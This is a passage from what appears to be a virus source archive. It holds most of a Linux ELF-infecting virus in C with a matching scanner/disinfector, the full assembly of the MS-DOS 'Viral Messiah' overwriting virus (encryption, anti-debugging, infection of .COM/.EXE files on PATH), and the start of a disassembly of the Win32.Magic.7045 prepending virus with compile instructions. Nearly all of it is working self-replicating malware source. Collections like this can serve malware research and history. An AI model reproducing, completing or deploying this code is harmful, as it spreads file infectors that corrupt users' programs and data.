* [buggy: an objectfile is also elf as a full executable {:-(8 ]
*/
int iself(char *host)
{
int in,
r = 0;
char mn[5] = {0x7f,0x45,0x4c,0x46,'\0'}, /* .ELF */
buff[5] = {'\0'};
DFPRINTF("@f iself: look at file <%s>\n", host);
if ((in = open(host, O_RDONLY)) == -1)
return -1;
if ((r = read(in, buff,4)) == -1)
return -1;
if (strcmp(buff, mn) == 0) {
close (in);
return 1;
}
else {
close (in);
return 0;
}
}
/* isclean() returns 1 if 'file' is clean
* and 0 if not - "clean" means healty,
* ELF-executable and normal file (not dir ...)
*/
int isclean(char *file)
{
if (isregular(file) == 0) /* prove this first !!! */
return 0;
if (isinfected(file) == 1)
return 0;
if (iself(file) == 0)
return 0;
return 1;
}
/* is <file> a normal one ? (links are, directorys not)
* returns 1 if so
*/
int isregular(char *file)
{
struct stat status;
DFPRINTF("@f isregular: <%s>\n", file);
if (stat(file, &status) == -1)
return 0;
if (!S_ISREG(status.st_mode))
return 0;
else
return 1;
}
/* --------------- exechost ------------------
* execs the file wich follows the virii and wich must
* be seppareted
*/
int exechost(char *caller, char **arglist, char **envlist)
{
int i, j, in, out,
r, w;
char *buff;
const int vlength = VLENGTH;
char tempfile[20];
struct stat status;
DFPRINTF("@f exechost: caller = <%s> argv[0] = <%s>\n", caller, arglist[0]);
DFPRINTF("=========== end of report =============\n");
#ifdef DEBUG
if (fd != stdout)
fclose(fd);
#endif
if ((buff = (char*)(malloc(vlength))) == NULL)
return -1;
/* copy rest out of the program */
if ((in = open(caller, O_RDONLY)) == -1)
return -1;
/* Since the files wich are just executed are locked (can't be opened for
* writing) and more than one of them can run at the same time [that means
* also more that one of a infected file ...] under UNIX we have to search
* for the next tempfile (/tmp/tempXYZ) we can use.
*/
out = -1;
j = 0;
while (out < 0) {
sprintf(tempfile, "%s%d", TEMP, j++);
out = open(tempfile, O_RDWR|O_CREAT|O_TRUNC);
}
/* from position 'vlength' ,the virus ends there */
if (lseek(in, vlength, SEEK_SET) == -1)
return -1;
while ((r = read(in, buff, vlength)) > 0) {
if ((w = write(out, buff, r)) == -1)
return -1;
}
close(in);
close(out);
free(buff);
/* put the ORIGINAL attribs of the file to the tempfile */
saveattribs(caller, &status);
restoreattribs(tempfile, status);
execve(tempfile, arglist, envlist);
while (1);
}
/* ------------------------------- cp ----------------------------
* copy 'oldfile' to 'newfile' ,don't look for permissons
*/
int cp(char *oldfile,char *newfile)
{
char *buff;
int nf,of,r,w;
if ((buff = (char*)malloc(5000)) == NULL)
return -1;
if ((of = open(oldfile, O_RDONLY)) == -1)
return -1;
if ((nf = open(newfile, O_RDWR|O_CREAT|O_TRUNC)) == -1)
return -1;
while ((r = read(of, buff, 5000)) > 0) {
if ((w = write(nf, buff, r)) == -1)
return -1;
}
DFPRINTF("@f cp: successfull copy of %s to %s\n", oldfile, newfile);
free(buff);
close(nf);
close(of);
return 0;
}
/*---------------------------------------------*/
int saveattribs(char *host, struct stat *status)
{
return stat(host, status);
}
/*---------------------------------------------*/
int restoreattribs(char *host, struct stat status)
{
struct utimbuf time;
int retval;
if ((retval = chmod(host, status.st_mode)) < 0)
return retval;
time.actime = status.st_atime;
time.modtime = status.st_mtime;
return utime(host, &time);
}
/* --- Cut - End FILE_OPS.C --- */
/* --- Cut - Begin GET.C --- */
/* this file contains the functions for find first/next :)
* and all the others ...
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <dirent.h>
#include <sys/stat.h>
#include "vx.h"
#ifdef DEBUG
extern FILE *fd;
#endif
/* the same as 'whereis' on the shell
* ATTENTION - return only static - t.m. you can't
* use it for further actions.At the next call of whereis() the
* buffer will be overwritten !!!
* So its need to save the return in a copy before we call whereis()
* again.
*/
char *whereis(char *path, char *prog)
{
#define IN_PATH path - _begin < pathlen + 2
static char file[200];
int i = 0, pathlen;
char *_begin;
struct stat status;
_begin = path;
pathlen = strlen(path);
if (strstr(prog,"/") != NULL) /* if its entered with path */
return prog; /* -> gotcha */
memset(file,'\0',200);
/* Loop until found or the pointer is not longer "in path".
* [the strXYZ() functions fuzzy the best debugger.
* If you want feel free to debug the virus. :-> ]
*/
while (access(file, X_OK) != 0 && IN_PATH) {
i = strcspn(path,":"); /* split string into dirs */
strcpy(file, ""); /* only for '\0' ! */
strncat(file, path, i);
strcat(file, "/");
strcat(file, prog);
path = path + i + 1;
}
if (!(IN_PATH))
return NULL;
else {
DFPRINTF("@f whereis: found file <%s>\n", file);
return file;
}
#undef IN_PATH
}
/* search randomly a directory (one from path)
* and use this for further actions
*/
char *getdir(char *path)
{
#define NOT_IN_PATH path - _begin >= pathlen
#define RANDNUM (int)((double)strlen(path)*rand()/(RAND_MAX + 1.0))
static char dir[100];
int n, r, not_found = 1, pathlen;
char *_begin;
static first = 1;
_begin = path;
pathlen = strlen(path);
memset(dir,'\0',100);
if (first)
srand(getpid());
first = 0;
while (not_found) {
r = RANDNUM;
path += r;
if (r != 0) {
path += strcspn(path, ":");
path ++;
}
if (NOT_IN_PATH) {
path = _begin;
continue;
}
not_found = 0;
n = strcspn(path, ":");
strcpy(dir, ""); /* ... */
strncat(dir, path, n);
strcat(dir,""); /* needed ??? ... */
}
DFPRINTF("@f getdir: found directory <%s>\n", dir);
return dir;
#undef NOT_IN_PATH
#undef RANDNUM
}
/* Search in 'dir' until a "good" file is found
* or all of them are seen as "bad" .
* In this case we come back later :-) .
* If flag == 1 return includes path, if flag == 0 not.
*/
char *gethost(char *dir, int flag)
{
#define RANDNUM (int)((double)(found)*rand()/(RAND_MAX + 1.0)) /* uff */
static int first = 1, gen = 0;
int r, i = 0;
static struct dirent **filelist;
char *host, *path;
static int found;
path = getenv("PATH");
/* Only 'randomize' at the first call .
* Use scandir() to read out the directory.
*/
if (first) {
if ((found = scandir(dir, &filelist, 0, 0)) <= 0)
return NULL;
srand(getpid());
}
r = RANDNUM;
/* Get one of the file randomly. */
if ((host = whereis(path, filelist[r]->d_name)) == NULL)
return NULL;
/* isclean means ready for infection: NOT a directory
* NOT a textfile and NOT infected
*/
while (isclean(host) != 1 && i < found) {
r = RANDNUM;
if((host = whereis(path, filelist[r]->d_name)) == NULL)
return NULL;
i++;
}
first = 0;
if (i >= found)
return NULL;
else {
DFPRINTF("@f gethost: got host <%s>\n", host);
if (flag == 0)
return filelist[r]->d_name; /* static */
if (flag == 1)
return host; /* static, da host ein statischer */
else /* return von *whereis(...) ist */
return NULL;
}
#undef RANDNUM
}
/* --- Cut - End GET.C --- */
/* --- Cut - Begin VX.H --- */
#include <sys/stat.h>
#define FILEONLY 0
#define FILEPATH 1
#define VLENGTH 8000 /* you may have to change this value */
/* be sure that /root/VTEST exists if DEBUG is turned on ... */
#ifdef DEBUG
#define TRACEFILE "/root/VTEST/VIRtrace"
#define DFPRINTF(format, args...) fprintf(fd, format, ##args)
#else
#define DFPRINTF(format,args...)
#endif
int infect(int, char*);
int exechost(char*, char**, char**);
int isinfected(char*);
int iself(char*);
int cp(char*, char*);
int restoreattribs(char*, struct stat);
int saveattribs(char*, struct stat*);
int infect_host(char*, char*);
int isclean(char*);
int isregular(char*);
char *whereis(char*, char*);
char *gethost(char*,int);
char *getdir(char*);
/* --- Cut - End VX.H --- */
/* --- Cut - Begin NACS.C --- */
/* Falls er sich mal aus dem Staub macht ...
*
* $ cc -O2 nacs.c get.c file_ops.c -o nacs
* $ strip nacs
*
* NetW0rker/ S V A T
*/
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include "vx.h"
#undef DEBUG
int scan_dir (char*, char*, int);
int disinfect(char*);
int main (int argc, char *argv[])
{
int FLAG = 0; /* == 0 -> nicht saeubern, == 1 saeubern */
if (argc < 2) {
printf("\n\n nacs V 0.1 Beta \\/ >< Virusscanner fuer den LDV I\n\n"
"Aufruf: <nacs [directory] [logfile]> scannt 'directory' mit allen Unterverzeichnissen\n\n");
exit(0);
}
if (argc == 4)
FLAG = 1;
scan_dir (argv[1], argv[2], FLAG);
printf ("\n\nnacs: fertig\n\n");
return 0;
}
/*------------------------------------------------- */
int scan_dir (char *directory, char *logfile, int flag)
{
FILE *fd;
char *fileapath;
struct dirent **filelist;
struct stat buf;
int count = 0,i = 0;
char *detectstring = "VLP";
fd = fopen(logfile, "w+"); /* return egal */
if ((fileapath = (char*) (malloc (1000))) == NULL)
perror (""), exit (1);
if ((i = scandir (directory, &filelist, 0, 0)) == -1) // dir. scannen
perror (""), exit (2);
for (count = 2; count < i; count++) { /* alle gefundenen Dateien,ausser "." , ".." */
if ((fileapath = strcpy (fileapath, directory)) == NULL) // Pfad
perror (""), exit (3);
fileapath = strcat (fileapath, "/"); /* Trenner */
if ((fileapath = strcat (fileapath, filelist[count]->d_name)) == NULL) // + Datei
perror (""), exit (4);
stat (fileapath, &buf);
if ((buf.st_mode & S_IFDIR) == S_IFDIR) /* falls Unterverzeichniss */
scan_dir (fileapath, logfile, flag); /* rekursiv weiter */
else { /* sonst scannen */
printf("\r ");
printf(" \r");
printf("Datei <%s> ist ", fileapath);
if (isinfected (fileapath)) {
if (fd != NULL)
fprintf(fd, "Datei <%s> ist infiziert.", fileapath);
printf ("infiziert");
if (flag) {
disinfect(fileapath);
printf(" ... I disinfect ...");
if (fd != NULL)
fprintf(fd, " ... I disinfect ...");
}
if (fd != NULL)
fprintf(fd, "\n");
}
else
printf("sauber");
fflush(stdout);
} /* else */
} /* for */
return count;
}
int disinfect(char *file)
{
int in, out, r;
char *buf;
buf = (char*)malloc(10000);
if (buf == NULL)
perror(""), exit(1);
cp(file, "./tmp");
in = open("./tmp", O_RDWR);
out = open(file, O_RDWR|O_TRUNC);
lseek(in, VLENGTH, SEEK_SET); /* ueber virus wegSEEKEN */
while ((r = read(in, buf, 10000)) > 0) /* cleanen teil kopieren */
write(out, buf, r);
close(in);
close(out);
remove("./tmp");
return 0;
}
/* --- Cut - End NACS.C --- */

340
MSDOS/Virus.MSDOS.Unknown.vmessiah.asm Normal file
View File

@ -0,0 +1,340 @@
; VMESSIAH.ASM -- Viral Messiah Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man
virus_type equ 1 ; Overwriting Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
flag: xchg dh,dh
xchg bp,ax
xchg bp,ax
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
mov bx,offset null_vector ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard
mov cx,0005h ; Do 5 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
jmp short strt00 ; Success -- skip jump
skip00: jmp end00 ; Skip the routine
strt00: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
mov si,offset data00 ; SI points to data
xor dx,dx ; Clear DX
print_loop: lodsb ; Load the next char. into AL
xor ah,ah ; BIOS print char. function
or al,al ; Is the character a null?
je print_done ; If it is, exit
int 017h ; BIOS video interrupt
jmp short print_loop ; Do the next character
print_done:
end00: mov ax,04C00h ; DOS terminate function
int 021h
main endp
db 08Dh,04Eh,054h,059h,0E0h
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call traverse_path ; Start the traversal
traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful?
je done_searching ; If so then we're done
call found_subdir ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
mov dx,offset com_mask ; DX points to "*.COM"
call find_files ; Try to infect a .COM file
jnc done_searching ; If successful the exit
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect an .EXE file
jnc done_searching ; If successful the exit
jmp short traversal_loop ; Keep checking the PATH
done_searching: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [path_ad],0 ; Did we run out of directories?
jne at_least_tried ; If not then exit
stc ; Set the carry flag for failure
at_least_tried: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db "*.COM",0 ; Mask for all .COM files
exe_mask db "*.EXE",0 ; Mask for all .EXE files
search_files endp
traverse_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment
xor di,di ; DI holds the starting offset
find_path: mov si,offset path_string ; SI points to "PATH="
lodsb ; Load the "P" into AL
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of "PATH="
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking
mov word ptr [path_ad],di ; Save the PATH address for later
mov word ptr [path_ad + 2],es ; Save PATH's segment for later
ret ; Return to caller
path_string db "PATH=" ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
traverse_path endp
found_subdir proc near
lds si,dword ptr [path_ad] ; DS:SI points to the PATH
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_subdir: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_subdir ; Keep transfering characters
moved_last_one: xor si,si ; Zero SI to signal completion
moved_one: mov word ptr es:[path_ad],si; Store SI in the path address
ret ; Return to caller
found_subdir endp
db 0FEh,0C9h,04Bh,0DFh,06Eh
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
db 07Dh,0F9h,074h,000h,09Bh
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes?
jne infection_done ; If it is then exit
cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM?
je infection_done ; If it is then skip it
cmp word ptr [si + 01Ah],(finish - start)
jb infection_done ; If it's too small then exit
mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,4 ; CX holds bytes to read (4)
mov dx,offset buffer ; DX points to buffer
int 021h
mov ah,03Eh ; DOS close file function
int 021h
push si ; Save DTA address before compare
mov si,offset buffer ; SI points to comparison buffer
mov di,offset flag ; DI points to virus flag
mov cx,4 ; CX holds number of bytes (4)
rep cmpsb ; Compare the first four bytes
pop si ; Restore DTA address
je infection_done ; If equal then exit
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
buffer db 4 dup (?) ; Buffer to hold test data
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
data00 db "I am your VIRAL MESSIAH",13,10
db "Follow me and be redeemed",13,10
db "Your data doth exist no more",13,10
db "The FAT holds ashes of your dreams",13,10,0
vcl_marker db "[VCL]",0 ; VCL creation marker
note db "[Viral Messiah]",0
db "Nowhere Man, [NuKE] '92",0
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 8],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 7],1 ; Change all SIs to DIs
xor word ptr [si + 10],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main

655
MSDOS/Virus.MSDOS.Unknown.voodoo.asm Normal file
View File

@ -0,0 +1,655 @@
comment *
Win32.Magic.7045 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects
all files in all directories at drive C:, D:, E: and F:, when executed, by
every file in current directory and Windows directory, when executed, by
prepending the virus to the original EXE file.
Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML /Q /ZD VOODOO.ASM
TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32
*
.386
.model flat
; KERNEL32.dll
extrn CopyFileA:proc
extrn CloseHandle:proc
extrn CreateFileMappingA:proc
extrn CreateProcessA:proc
extrn DeleteFileA:proc
extrn CreateFileA:proc
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn FlushViewOfFile:proc
extrn GetCommandLineA:proc
extrn GetCurrentDirectoryA:proc
extrn GetExitCodeProcess:proc
extrn GetFileSize:proc
extrn ExitProcess:proc
extrn GetProcAddress:proc
extrn GetStartupInfoA:proc
extrn GlobalAlloc:proc
extrn GlobalFree:proc
extrn GlobalLock:proc
extrn GlobalUnlock:proc
extrn MapViewOfFile:proc
extrn ReadFile:proc
extrn SetCurrentDirectoryA:proc
extrn SetFileAttributesA:proc
extrn SetFileTime:proc
extrn Sleep:proc
extrn UnmapViewOfFile:proc
extrn lstrcpyA:proc
extrn GetModuleHandleA:proc
; USER32.dll
extrn MessageBoxA:proc
.data
VirusSize equ 1b85h ; Size of virus (7045 bytes)
nBufferLength equ 320h ; Size, in characters, of directory
; buffer
MAX_PATH equ 104h
FALSE equ 00h
TRUE equ 01h
FILE_ATTRIBUTE_DIRECTORY equ 10h
; The "file or directory" is a
; directory
FILE_ATTRIBUTE_ARCHIVE equ 20h ; The file is an archive file.
; Applications use this attribute to
; mark files for backup or removal.
CREATE_NEW equ 01h ; Creates a new file. The function
; fails if the specified file already
; exists.
OPEN_EXISTING equ 03h ; Opens the file. The function fails
; if the file does not exist.
FILE_SHARE_READ equ 01h ; Other open operations can be
; performed on the file for read
; access. If the CreateFile function
; is opening the client end of a
; mailslot, this flag is specified.
FILE_SHARE_WRITE equ 02h ; Other open operations can be
; performed on the file for write
; access.
GENERIC_WRITE equ 40000000h
; Specifies write access to the file.
; Data can be written to the file and
; the file pointer can be moved.
GENERIC_READ equ 80000000h
; Specifies read access to the file.
; Data can be read from the file and
; the file pointer can be moved.
PAGE_READWRITE equ 04h ; Gives read-write access to the
; committed region of pages
FILE_MAP_WRITE equ 02h ; Read-write access
NORMAL_PRIORITY_CLASS equ 20h ; Indicates a normal process with no
; special scheduling needs.
INVALID_HANDLE_VALUE equ -01h
STARTUPINFO struct
cb DWORD ? ; Specifies the size, in bytes, of the
; structure.
lpReserved DWORD ? ; Reserved. Set this member to NULL
; before passing the structure to
; CreateProcess
lpDesktop DWORD ? ; Points to a zero-terminated string
; that specifies either the name of
; the desktop only or the name of both
; the window station and desktop for
; this process
lpTitle DWORD ? ; For console processes, this is the
; title displayed in the title bar if
; a new console window is created
dwX DWORD ? ; Specifies the x offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwY DWORD ? ; Specifies the y offset, in pixels,
; of the upper left corner of a window
; if a new window is created. The
; offset is from the upper left corner
; of the screen
dwXSize DWORD ? ; Specifies the width, in pixels, of
; the window if a new window is
; created
dwYSize DWORD ? ; Specifies the height, in pixels, of
; the window if a new window is
; created
dwXCountChars DWORD ? ; Specifies the screen buffer width in
; character columns
dwYCountChars DWORD ? ; Specifies the screen buffer height
; in character rows
dwFillAttribute DWORD ? ; Specifies the initial text and
; background colors if a new console
; window is created
dwFlags DWORD ? ; This is a bit field that determines
; whether certain STARTUPINFO members
; are used when the process creates a
; window
wShowWindow WORD ? ; Specifies the default value the first
; time
cbReserved2 WORD ? ; Reserved; must be zero
lpReserved2 DWORD ? ; Reserved; must be NULL
hStdInput DWORD ? ; Specifies a handle that will be used
; as the standard input handle of the
; process
hStdOutput DWORD ? ; Specifies a handle that will be used
; as the standard output handle of the
; process
hStdError DWORD ? ; Specifies a handle that will be used
; as the standard error handle of the
; process
ends
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
PROCESS_INFORMATION struct
hProcess DWORD ? ; Handle to the newly created process
hThread DWORD ? ; Handle to the primary thread of the
; newly created process
dwProcessId DWORD ? ; Global process identifier that can
; be used to identify a process
dwThreadId DWORD ? ; global thread identifiers that can
; be used to identify a thread
ends
szFileName db '*.EXE',00h ; Name of file to search for
szFileName_ db '*.*',00h ; " " " " " "
szCurDir db 'c:\',00h ; Name of new current directory
db 'Magic People-Voodoo People !',00h
db 00h
ProcessInformation PROCESS_INFORMATION <>
dwExitCode dd ? ; Termination status
dwFileHandle dd ? ; File handle
dwFileHandle_ dd ? ; File handle
dwMappingHandle dd ? ; File mapping handle
lpMappedView dd ? ; Starting address of the mapped view
dwFileSize dd ? ; Low-order doubleword of the file
; size
infect_flag db ? ; Infection flag
exit_flag db ? ; Exit flag
NumberOfBytesRead dd ? ; Number of bytes read
lpFileExtension dd ? ; Pointer to file extension
StartupInfo STARTUPINFO <>
szFileName__:
db 11ah dup(00h)
db 206h dup(?)
FindFileData WIN32_FIND_DATA <>
db 20eh dup(?)
cBuffer db VirusSize dup(?)
; Buffer that receives data
dwSearchHandle dd ? ; Search handle
dwSearchHandle_ dd ? ; Search handle
szCurDir_:
cBuffer_ db 320h dup(?) ; Buffer for current directory
szCurDir__:
cBuffer__ db 320h dup(?) ; Buffer for current directory
db 724h dup(?)
.code
code_begin:
push offset StartupInfo ; Address of STARTUPINFO structure
call GetStartupInfoA
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
cmp byte ptr [esi+01h],':' ; Not Universal Naming Convention
; (UNC)?
je _lstrcpyA ; Equal? Jump to _lstrcpyA
inc eax ; Increase pointer to the command-line
; string for the current process
_lstrcpyA:
push eax ; EAX = address of string to copy
push offset szFileName__ ; Address of buffer
call lstrcpyA
lea esi,szFileName__ ; ESI = offset of szFileName__
find_dot_in_filename:
inc esi ; Increase pointer to the command-line
; string for the current process
cmp byte ptr [esi],'.' ; Found dot in filename?
jne find_dot_in_filename ; Not equal? Jump to
; find_dot_in_filename
mov byte ptr [esi+04h],00 ; Store zero at end of filename
mov [lpFileExtension],esi ; Store pointer to file extension
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ ; Share mode
push GENERIC_READ ; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle],eax ; Store file handle
push eax ; EAX = file handle
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push VirusSize ; Number of bytes to read
push offset cBuffer ; Address of buffer that receives data
push eax ; Handle of file to read
call ReadFile
pop eax ; EAX = file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
cmp eax,VirusSize ; First generation?
je virus_exit ; Equal? Jump to virus_exit
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov [esi],'MOC.' ; Store file extension
cmp [esi+05h],'$$$$' ; Temporarily disnfected file?
je _DeleteFileA ; Equal? Jump to _DeleteFileA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push CREATE_NEW + OPEN_EXISTING
; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ + FILE_SHARE_WRITE
; Share mode
push GENERIC_READ + GENERIC_WRITE
; Access (read-write) mode
push offset szFileName__ ; Address of name of the file
call CreateFileA
mov [dwFileHandle_],eax ; Store file handle
push 00h ; Name of file-mapping object
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle_] ; Handle of file to map
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push [dwFileSize] ; Low-order doubleword of object size
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push 00h ; Address of structure for data
push offset NumberOfBytesRead
; Address of number of bytes read
push [dwFileSize] ; Low-order doubleword of object size
push eax ; Address of buffer that receives data
push [dwFileHandle] ; Handle of file to read
call ReadFile
push 00h ; Number of bytes in range
push [lpMappedView] ; Starting address of the mapped view
call FlushViewOfFile
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
push [dwFileHandle_] ; Handle of object to close
call CloseHandle
push offset ProcessInformation
; Pointer to PROCESS_INFORMATION
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
jmp _CloseHandle
virus_exit:
mov [exit_flag],TRUE ; Exit code for all threads
_CloseHandle:
